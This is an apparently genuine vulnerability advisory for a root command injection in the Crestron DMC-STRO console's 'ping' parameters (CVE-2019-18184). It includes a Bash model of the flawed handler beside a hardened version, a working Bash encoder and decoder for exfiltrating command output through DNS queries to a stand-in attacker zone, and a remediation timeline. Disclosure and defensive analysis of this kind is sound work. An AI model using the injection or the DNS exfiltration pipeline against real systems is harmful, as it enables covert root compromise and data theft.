  • Crestron DMC-STRO Remote Root RCE

    27-11-2019

    CVEID: CVE-2019-18184
    Affected Products and Versions: CRESTRON DMC-STRO firmware 1.0

    Executive Summary
    A critical vulnerability was discovered in the Crestron DMC-STRO (firmware 1.0). The CTP Console does not sanitize the parameters of the 'ping' command:
    Bash command substitution placed in those parameters is executed by the device on behalf of the root user.
    An attacker able to reach the CTP Console can therefore run arbitrary commands as root,
    and the output of those commands can be exfiltrated through a DNS covert channel.

    Additional Information
    The CTP Console passes the parameters of the 'ping' command to a Bash shell without sanitizing them. Bash command substitution ($(...) or backticks) placed in those parameters is therefore executed on the device on behalf of the root user.

    [Screenshot: RCE DMC-STRO in ping parameters]
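    The following is an added example, not Crestron's console code: a minimal Bash model of a console command handler that splices the user-supplied 'ping' argument into a shell command line, beside a hardened version. The function names and the fake_ping stand-in (used instead of /bin/ping so the script runs offline) are assumptions; the DMC-STRO's real handler was not available for inspection.

```bash
#!/usr/bin/env bash
# Added example, not the device's code. Models the bug class described
# above: a console handler that lets the shell re-parse user input.

# Stand-in for /bin/ping (assumption, so the example runs offline):
# it only prints the argv it would have received.
fake_ping() { printf 'ping %s\n' "$*"; }

# VULNERABLE: the argument is re-parsed by the shell, so anything the shell
# expands, $(...) and `...` command substitution in particular, runs with
# the privileges of the console process (root on the DMC-STRO).
vulnerable_ping() {
    eval "fake_ping -c 1 $1"
}

# HARDENED: allow only the characters a hostname or IPv4 literal can
# contain, refuse empty and option-looking arguments, and pass the value as
# a single quoted argv element. No eval and no re-parsing, so substitution
# syntax is inert data.
safe_ping() {
    target=$1
    case $target in
        ''|-*|*[!A-Za-z0-9.-]*)
            printf 'rejected target: %s\n' "$target" >&2
            return 1 ;;
    esac
    fake_ping -c 1 "$target"
}

# Demonstration with a harmless substitution. On the real console the same
# input would run whatever command the attacker put inside $(...) as root.
demo() {
    echo "vulnerable handler:"
    vulnerable_ping '127.0.0.1 $(echo INJECTED)'
    echo "hardened handler:"
    safe_ping '127.0.0.1 $(echo INJECTED)' || true
    safe_ping 127.0.0.1
}

demo
```

    The vulnerable handler prints "ping -c 1 127.0.0.1 INJECTED": the substitution ran before ping ever saw its arguments. The hardened handler rejects the same input outright. Note that the fix is an allow-list plus quoting, not a deny-list of shell metacharacters; a firewall rule in front of the console only limits who can reach the bug.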

    Through a DNS covert channel (the output of the injected commands is embedded in DNS queries for a domain under the attacker's control, which the C2 answers and logs) it was possible to enumerate the binaries available under /bin and /usr/bin. Enumerating the content of those directories showed that a Lua interpreter was available. I therefore wrote a Lua script that executes commands on the target, base64-encodes the result, splits it into chunks and sends them back to the C2 as DNS queries.

    [Screenshot: Execute commands and exfiltrate data through the DNS covert channel]

    From the C2 it is then possible to reassemble the base64 chunks in order and decode the payload to obtain the output of the executed command.

    [Screenshot: Decode the base64-encoded payload]
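    The following is an added example and not the author's Lua script or C2 tooling: a shell model of both ends of the covert channel described above, the sender that chunks and encodes command output into query names, and the receiver that reassembles and decodes what the resolver logged. The zone name, chunk size, the "<seq>.<total>.<chunk>.<zone>" query layout, and the sample command output are assumptions made for the example.

```bash
#!/usr/bin/env bash
# Added example, not the original research code. Assumed layout of each
# exfiltration query:  <seq>.<total>.<chunk>.<zone>

ZONE="exfil.example"   # assumed attacker-controlled zone whose NS is the C2
CHUNK=40               # label size; a DNS label may hold at most 63 octets

# Sender side (what the script on the device does): base64 the command
# output, map the characters that are not legal in hostnames ('+' '/' '=')
# to base64url with padding dropped, split into fixed-size labels and emit
# one QNAME per chunk, numbered so the receiver can restore the order.
make_queries() {
    base64 | tr -d '\n' | tr '+/' '-_' | tr -d '=' | fold -w "$CHUNK" |
        awk -v zone="$ZONE" '{ c[NR] = $0 }
             END { for (i = 1; i <= NR; i++) printf "%d.%d.%s.%s\n", i, NR, c[i], zone }'
}

# Receiver side (the C2): queries arrive out of order and retried queries
# produce duplicates. Keep the first copy of each sequence number, order
# numerically, strip sequence, total and zone, restore the standard
# alphabet and padding, and decode.
reassemble() {
    grep -F ".$ZONE" | sort -t. -k1,1n -u | cut -d. -f3 | tr -d '\n' |
        tr '_-' '/+' |
        awk '{ s = $0; while (length(s) % 4) s = s "="; printf "%s", s }' |
        base64 -d
}

# Gap check: print the ranges of sequence numbers that never arrived, so a
# truncated result is noticed instead of being silently decoded. The total
# carried in every query lets a missing final chunk be detected too.
missing_chunks() {
    grep -F ".$ZONE" | cut -d. -f1,2 | sort -t. -k1,1n -u |
        awk -F. 'NR == 1 { prev = 0 }
                 { total = $2 }
                 $1 != prev + 1 { printf "%d-%d\n", prev + 1, $1 - 1 }
                 { prev = $1 }
                 END { if (prev < total) printf "%d-%d\n", prev + 1, total }'
}

# Constructed sample: output of a hypothetical `id` run on the device.
SAMPLE_OUTPUT="uid=0(root) gid=0(root) groups=0(root)"

# Constructed resolver log: the sender's queries delivered out of order,
# plus one retried (duplicate) query.
captured_queries() {
    queries=$(printf '%s\n' "$SAMPLE_OUTPUT" | make_queries)
    printf '%s\n' "$queries" | sort -r
    printf '%s\n' "$queries" | head -n 1
}

echo "queries seen by the C2:"; captured_queries
echo "decoded:"; captured_queries | reassemble
```

    Running it prints three query names (two chunks, one duplicated) and decodes them back to the sample output. Two practical caveats that the pipeline encodes: raw base64 is not hostname-safe, hence the base64url alphabet and dropped padding, and a label longer than 63 octets or a full name longer than 253 octets is rejected by resolvers, hence the fixed chunk size.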

    Remediation:
    Block connections to the CTP Console with a firewall rule, and update the DMC-STRO firmware to a version that fixes the issue.

    Discoverer:
    Gabrio Tognozzi <g.tognozzi@quantumleap.it>; <gtognozzi@deloitte.it>

    Timeline:
    19/09/2019 Vulnerability was reported to the vendor
    07/10/2019 Vendor confirmed the vulnerability was queued for a fix
    27/11/2019 Vulnerability details published
